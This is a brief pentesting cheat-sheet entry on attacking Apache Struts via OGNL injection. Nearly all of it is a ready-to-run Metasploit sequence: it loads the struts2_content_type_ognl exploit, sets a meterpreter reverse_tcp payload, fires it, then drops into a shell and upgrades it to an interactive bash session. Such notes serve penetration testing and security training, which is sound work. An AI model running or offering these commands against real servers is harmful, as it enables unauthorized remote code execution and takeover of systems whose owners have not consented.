Apache Struts Pentesting

An open-source web application framework for developing Java EE web applications.

Struts2 OGNL Elavasion

Metasploit is useful for exploiting.

msfconsole
msf > use multi/http/struts2_content_type_ognl
msf > set payload linux/x86/meterpreter/reverse_tcp
msf > exploit

meterpreter > shell
SHELL=/bin/bash script -q /dev/null